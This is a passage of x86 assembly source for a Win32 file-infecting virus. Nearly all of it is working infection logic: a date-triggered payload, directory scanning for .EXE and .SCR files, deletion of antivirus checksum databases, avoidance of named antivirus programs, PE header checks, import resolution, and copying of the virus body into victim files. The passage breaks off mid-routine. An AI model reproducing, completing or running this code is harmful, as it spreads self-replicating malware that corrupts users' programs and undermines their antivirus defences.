;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
mem_entry: ;From this point we no longer care about host
|
||
;base address
|
||
|
||
call mem_delta
|
||
mem_delta: pop ebp
|
||
sub ebp,offset mem_delta
|
||
|
||
;Get current system time
|
||
|
||
lea eax,dword ptr [ebp+my_system_time]
|
||
push eax
|
||
call dword ptr [ebp+a_GetSysTime]
|
||
|
||
;It's time to call our payload routine????
|
||
|
||
mov ax,word ptr [ebp+inf_month]
|
||
add ax,0003h
|
||
mov dx,000Ch
|
||
cmp ax,dx
|
||
jbe check_month
|
||
sub ax,dx
|
||
check_month: cmp ax,word ptr [ebp+time_month]
|
||
jne viral_sleep
|
||
mov ax,word ptr [ebp+inf_day]
|
||
cmp ax,word ptr [ebp+time_day]
|
||
jne viral_sleep
|
||
call payload
|
||
|
||
viral_sleep: ;Do direct action stuff
|
||
;The virus will infect files on \WINDOWS, \SYSTEM and
|
||
;current directory
|
||
|
||
;Try to infect files in current directory
|
||
|
||
lea eax,dword ptr [ebp+szWorkDir]
|
||
push eax
|
||
push MAX_PATH
|
||
call dword ptr [ebp+a_GetCurDir]
|
||
or eax,eax
|
||
jz try_windir
|
||
|
||
call do_in_dir
|
||
|
||
try_windir: ;Get windows directory
|
||
|
||
push MAX_PATH
|
||
lea eax,dword ptr [ebp+szWorkDir]
|
||
push eax
|
||
call dword ptr [ebp+a_GetWindowsDir]
|
||
or eax,eax
|
||
jz try_sysdir
|
||
|
||
;Try to infect files in \WINDOWS directory
|
||
|
||
call do_in_dir
|
||
|
||
try_sysdir: ;Get system directory
|
||
|
||
push MAX_PATH
|
||
lea eax,dword ptr [ebp+szWorkDir]
|
||
push eax
|
||
call dword ptr [ebp+a_GetSystemDir]
|
||
or eax,eax
|
||
jz err_virus_init
|
||
|
||
;Try to infect files in \SYSTEM directory
|
||
|
||
call do_in_dir
|
||
|
||
err_virus_init: ;We have to restore code at host entry-point?
|
||
|
||
xor eax,eax
|
||
cmp dword ptr [ebp+insert_size],eax
|
||
je back2host
|
||
|
||
;Get current process
|
||
|
||
call dword ptr [ebp+a_GetCurProc]
|
||
|
||
;Restore host entry-point code
|
||
;Use WriteProcessMemory in order to prevent exceptions
|
||
;while writing to protected areas
|
||
|
||
pop edx
|
||
push edx
|
||
xor ecx,ecx
|
||
push ecx
|
||
push dword ptr [ebp+insert_size]
|
||
lea ecx,dword ptr [ebp+entry_code]
|
||
push ecx
|
||
push edx
|
||
push eax
|
||
call dword ptr [ebp+a_WriteProcMem]
|
||
|
||
back2host: ;Back to host
|
||
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Infect *.EXE and *.SCR files in specified path
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
do_in_dir: ;The virus will not infect files in the root directory
|
||
;directory
|
||
;
|
||
;Entry:
|
||
;
|
||
;eax - path string size
|
||
;
|
||
;Exit:
|
||
;
|
||
;None
|
||
;
|
||
|
||
;Trying to infect files in root directory?
|
||
|
||
cmp eax,00000004h
|
||
jb file_not_found
|
||
|
||
;Delete some AV checksum databases
|
||
|
||
mov edx,eax
|
||
mov ecx,(end_AV_files-tbl_AV_files)/04h
|
||
lea esi,dword ptr [ebp+tbl_AV_files]
|
||
loop_del_AV: lodsd
|
||
push esi
|
||
add eax,ebp
|
||
mov esi,eax
|
||
call delete_file
|
||
pop esi
|
||
loop loop_del_AV
|
||
|
||
;Insert *.* into path
|
||
|
||
lea esi,dword ptr [ebp+szSearch]
|
||
call copy_szMask
|
||
|
||
;FindFirstFile
|
||
|
||
lea eax,dword ptr [ebp+my_FindData]
|
||
push eax
|
||
lea eax,dword ptr [ebp+szWorkDir]
|
||
push eax
|
||
call dword ptr [ebp+a_FindFirst]
|
||
cmp eax,INVALID_HANDLE_VALUE
|
||
je file_not_found
|
||
|
||
;Save the search handle
|
||
|
||
mov dword ptr [ebp+Search_h],eax
|
||
|
||
try_this_file: ;Check file size
|
||
|
||
xor eax,eax
|
||
cmp dword ptr [ebp+my_FindData.WFD_nFileSizeHigh],eax
|
||
jne cant_open
|
||
mov eax,dword ptr [ebp+my_FindData.WFD_nFileSizeLow]
|
||
cmp eax,0FFFFFFFFh-(inf_size+SIZE_PADDING)
|
||
jae cant_open
|
||
|
||
;Check if file is already infected
|
||
|
||
mov ecx,SIZE_PADDING
|
||
xor edx,edx
|
||
div ecx
|
||
or edx,edx
|
||
jz cant_open
|
||
|
||
;Add filename to path
|
||
|
||
cld
|
||
lea esi,dword ptr [ebp+szWorkDir]
|
||
mov edx,esi
|
||
do_path_1: lodsb
|
||
cmp al,"\"
|
||
jne avoid_path
|
||
mov edx,esi
|
||
avoid_path: or al,al
|
||
jne do_path_1
|
||
lea esi,dword ptr [ebp+my_FindData.WFD_szFileName]
|
||
mov edi,edx
|
||
do_path_2: lodsb
|
||
cmp al,"a"
|
||
jb char_is_ok
|
||
sub al,("a"-"A")
|
||
char_is_ok: cmp al,"V"
|
||
je cant_open
|
||
stosb
|
||
or al,al
|
||
jnz do_path_2
|
||
|
||
;The virus does not infect files with V character in their
|
||
;names as well as the following programs:
|
||
|
||
mov eax,dword ptr [edx]
|
||
|
||
;Panda antivirus
|
||
|
||
cmp eax,"DNAP"
|
||
je cant_open
|
||
|
||
;Datafellows F-Prot
|
||
|
||
cmp eax,"RP-F"
|
||
je cant_open
|
||
|
||
;McAfee Scan
|
||
|
||
cmp eax,"NACS"
|
||
je cant_open
|
||
|
||
;Check file extension, allow *.EXE and *.SRC files
|
||
|
||
mov eax,dword ptr [edi-00000005h]
|
||
cmp eax,"EXE."
|
||
je target_file
|
||
cmp eax,"RCS."
|
||
jne cant_open
|
||
|
||
target_file: ;Open and map file
|
||
|
||
call open_map_file
|
||
or eax,eax
|
||
jz cant_open
|
||
|
||
;Check if we can infect this file
|
||
|
||
call check_victim
|
||
jecxz bad_host
|
||
|
||
atach_2host: ;Infect file
|
||
|
||
call infect_file
|
||
jnc search_end
|
||
jmp short cant_open
|
||
|
||
bad_host: ;File cant be infected, skip it
|
||
|
||
call unmap_close
|
||
|
||
cant_open: ;Find next file
|
||
|
||
lea eax,dword ptr [ebp+my_FindData]
|
||
push eax
|
||
push dword ptr [ebp+Search_h]
|
||
call dword ptr [ebp+a_FindNext]
|
||
cmp eax,FALSE
|
||
jne try_this_file
|
||
|
||
search_end: ;Close Win32 find handle
|
||
|
||
push dword ptr [ebp+Search_h]
|
||
call dword ptr [ebp+a_FindClose]
|
||
|
||
file_not_found: ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Copy search mask into work path
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
copy_szMask: ;Entry:
|
||
;
|
||
;edx - Filename offset in path string
|
||
;esi - Search mask
|
||
;
|
||
;Exit:
|
||
;
|
||
;None
|
||
;
|
||
|
||
cld
|
||
lea edi,dword ptr [ebp+edx+szWorkDir]
|
||
mov al,"\"
|
||
stosb
|
||
loop_copy_name: lodsb
|
||
stosb
|
||
or al,al
|
||
jnz loop_copy_name
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Delete file in work path
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
delete_file: ;Entry:
|
||
;
|
||
;edx - Filename offset in path string
|
||
;esi - File to delete
|
||
;
|
||
;Exit:
|
||
;
|
||
;None
|
||
;
|
||
|
||
;Add filename to path
|
||
|
||
push ecx
|
||
push edx
|
||
call copy_szMask
|
||
|
||
;Reset attributes so we can delete write protected files
|
||
|
||
push FILE_ATTRIBUTE_NORMAL
|
||
lea eax,dword ptr [ebp+szWorkDir]
|
||
push eax
|
||
call dword ptr [ebp+a_SetFileAttr]
|
||
|
||
;Delete file
|
||
|
||
lea eax,dword ptr [ebp+szWorkDir]
|
||
push eax
|
||
call dword ptr [ebp+a_DeleteFile]
|
||
|
||
pop edx
|
||
pop ecx
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Check if a given file can be infected
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
check_victim: ;The host must be PE, fit allowed size and import at least
|
||
;one function from Kernel32
|
||
;
|
||
;Entry:
|
||
;
|
||
;a_Kernel32 - Base address for kernel32
|
||
;eax - Base address for memory mapped file
|
||
;
|
||
;Exit:
|
||
;
|
||
;ecx - Null if error
|
||
;eax - Preserved
|
||
;
|
||
|
||
;Save host base address
|
||
|
||
push ebp
|
||
push eax
|
||
|
||
;Set structured exception handler
|
||
|
||
call SEH_SetFrame01
|
||
mov esp,dword ptr [esp+00000008h]
|
||
err_checkfile: xor ecx,ecx
|
||
jmp SEH_error01
|
||
SEH_SetFrame01: xor edx,edx
|
||
push dword ptr fs:[edx]
|
||
mov dword ptr fs:[edx],esp
|
||
|
||
;Search for Kernel32 Import Module Descriptor, abort
|
||
;infection if not found
|
||
|
||
mov ebx,eax
|
||
|
||
;ebx - Base address of host in memory
|
||
|
||
;Check for MZ signature at base address
|
||
|
||
cld
|
||
cmp word ptr [ebx],IMAGE_DOS_SIGNATURE
|
||
jne err_checkfile
|
||
|
||
;Check file address of relocation table
|
||
|
||
cmp word ptr [ebx+DH_lfarlc],0040h
|
||
jb err_checkfile
|
||
|
||
;Now go to the pe header and check for the PE signature
|
||
|
||
mov esi,dword ptr [ebx+DH_lfanew]
|
||
add esi,ebx
|
||
lodsd
|
||
cmp eax,IMAGE_NT_SIGNATURE
|
||
jne err_checkfile
|
||
|
||
;Check machine field in IMAGE_FILE_HEADER
|
||
;just allow i386 PE files
|
||
|
||
cmp word ptr [esi+FH_Machine],IMAGE_FILE_MACHINE_I386
|
||
jne err_checkfile
|
||
|
||
;Now check the characteristics, look if file
|
||
;is an executable
|
||
|
||
mov ax,word ptr [esi+FH_Characteristics]
|
||
test ax,IMAGE_FILE_EXECUTABLE_IMAGE
|
||
jz err_checkfile
|
||
|
||
;Avoid DLL's
|
||
|
||
test ax,IMAGE_FILE_DLL
|
||
jnz err_checkfile
|
||
|
||
;Get pointer to imports raw data
|
||
|
||
mov edx,dword ptr [esi+OH_DataDirectory. \
|
||
DE_Import. \
|
||
DD_VirtualAddress+ \
|
||
IMAGE_SIZEOF_FILE_HEADER]
|
||
|
||
call RVA2RAW
|
||
jecxz err_checkfile
|
||
mov eax,ecx
|
||
|
||
next_imd_img: ;Search for kernel32 through the array of imported
|
||
;module descriptors
|
||
|
||
lea edi,dword ptr [ebp+offset szKernel32]
|
||
mov esi,dword ptr [eax+ID_Name]
|
||
|
||
;Exit if the RVA to dll name doesnt exist
|
||
or esi,esi
|
||
jz err_checkfile
|
||
|
||
;Sub the delta offset
|
||
|
||
sub esi,edx
|
||
|
||
;Get absolute address of dll name
|
||
|
||
add esi,ebx
|
||
|
||
;Compare names
|
||
|
||
mov ecx,00000008h
|
||
push eax
|
||
|
||
dll_loop: ;Get character from name into imports
|
||
|
||
lodsb
|
||
|
||
;Check if character is in lowercase
|
||
|
||
cmp al,"a"
|
||
jb check_char
|
||
|
||
;Convert character to uppercase
|
||
|
||
sub al,("a"-"A")
|
||
|
||
check_char: ;Compare characters with our KERNEL32 string
|
||
|
||
scasb
|
||
jne bad_dll
|
||
|
||
loop dll_loop
|
||
|
||
verify_ok: ;Name matched, get import module descriptor
|
||
|
||
pop edi
|
||
|
||
;Mutate RVAs
|
||
|
||
call mutate_rvas
|
||
|
||
;Avoid files with IMAGE_SCN_MEM_SHARED in its
|
||
;last section attributes
|
||
|
||
call get_last_sh
|
||
test dword ptr [edi+SH_Characteristics],IMAGE_SCN_MEM_SHARED
|
||
jnz err_checkfile
|
||
|
||
;Set ecx != NULL (success flag)
|
||
|
||
xor ecx,ecx
|
||
not ecx
|
||
|
||
SEH_error01: ;Remove structured exception handler
|
||
|
||
xor edx,edx
|
||
pop dword ptr fs:[edx]
|
||
pop edx
|
||
|
||
;Error, restore base address
|
||
|
||
pop eax
|
||
pop ebp
|
||
ret
|
||
|
||
bad_dll: ;Go to next imported module descriptor
|
||
|
||
pop eax
|
||
add eax,IMAGE_SIZEOF_IMPORT_DESCRIPTOR
|
||
jmp short next_imd_img
|
||
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Find the place where PE saves some useful information
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
mutate_rvas: ;Generate a copy of the virus into a buffer
|
||
;This copy will contain some RVAs already
|
||
;loaded (GetModuleHandle, GetProcAddress or Kernel32
|
||
;ID_ForwarderChain field)
|
||
;
|
||
;Entry:
|
||
;
|
||
;ebx - Base address for file
|
||
;edx - Section delta offset
|
||
;edi - Kernel32 Import Module Descriptor
|
||
;
|
||
;Exit:
|
||
;
|
||
;RVA's loaded into virus body (NULL if function not found)
|
||
;
|
||
|
||
;Copy virus to infection buffer
|
||
|
||
push edi
|
||
lea esi,dword ptr [ebp+Mem_Base]
|
||
lea edi,dword ptr [esi+mem_size]
|
||
mov ecx,inf_size-DECRYPTOR_SIZE
|
||
cld
|
||
rep movsb
|
||
pop edi
|
||
|
||
;Save rva to ID_ForwarderChain field
|
||
|
||
lea eax,dword ptr [edi+ID_ForwarderChain]
|
||
sub eax,ebx
|
||
add eax,edx
|
||
mov dword ptr [ebp+rva_kernel32+mem_size],eax
|
||
|
||
;Check if file is binded
|
||
|
||
mov eax,dword ptr [ebp+a_Kernel32]
|
||
mov esi,dword ptr[eax+IMAGE_DOS_HEADER.DH_lfanew]
|
||
add esi,eax
|
||
add esi,NT_FileHeader.FH_TimeDateStamp
|
||
lodsd
|
||
mov esi,dword ptr [edi+ID_FirstThunk]
|
||
sub esi,edx
|
||
add esi,ebx
|
||
cmp eax,dword ptr [edi+ID_TimeDateStamp]
|
||
je binded_file
|
||
|
||
;esi - Import Address Table for KERNEL32
|
||
|
||
;Save RVA for GetModuleHandle
|
||
|
||
push esi
|
||
lea edi,dword ptr [ebp+szGetModuleH]
|
||
call find_by_name
|
||
mov dword ptr [ebp+rva_GetModuleH+mem_size],eax
|
||
|
||
;Save RVA for GetProcAddress
|
||
|
||
pop esi
|
||
lea edi,dword ptr [ebp+szGetProcAddr]
|
||
call find_by_name
|
||
mov dword ptr [ebp+rva_GetProcAddr+mem_size],eax
|
||
|
||
ret
|
||
|
||
binded_file: ;esi - Import Address Table for KERNEL32
|
||
|
||
;Binded GetModuleHandle
|
||
|
||
push esi
|
||
mov edi,dword ptr [ebp+a_GetModuleH]
|
||
call find_by_address
|
||
mov dword ptr [ebp+rva_GetModuleH+mem_size],eax
|
||
|
||
;Binded GetProcAddress
|
||
|
||
pop esi
|
||
mov edi,dword ptr [ebp+a_GetProcAddr]
|
||
call find_by_address
|
||
mov dword ptr [ebp+rva_GetProcAddr+mem_size],eax
|
||
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Get RVA of an API function in a binded file
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
find_by_address:;
|
||
;Entry:
|
||
;
|
||
;edx - Delta offset for last section
|
||
;esi - Import Address Table for KERNEL32
|
||
;edi - Function entry point
|
||
;
|
||
;Exit:
|
||
;
|
||
;eax - RVA of function address (NULL if not found)
|
||
;
|
||
|
||
search_thunk: ;Check if this is the storage address
|
||
|
||
lodsd
|
||
or eax,eax
|
||
jz err_by_address
|
||
cmp eax,edi
|
||
jne search_thunk
|
||
|
||
;Calculate the offset of that thunk dword into file
|
||
|
||
lea eax,dword ptr [esi-00000004h]
|
||
sub eax,ebx
|
||
add eax,edx
|
||
ret
|
||
|
||
err_by_address: xor eax,eax
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Find RVA of a function imported by name
|
||
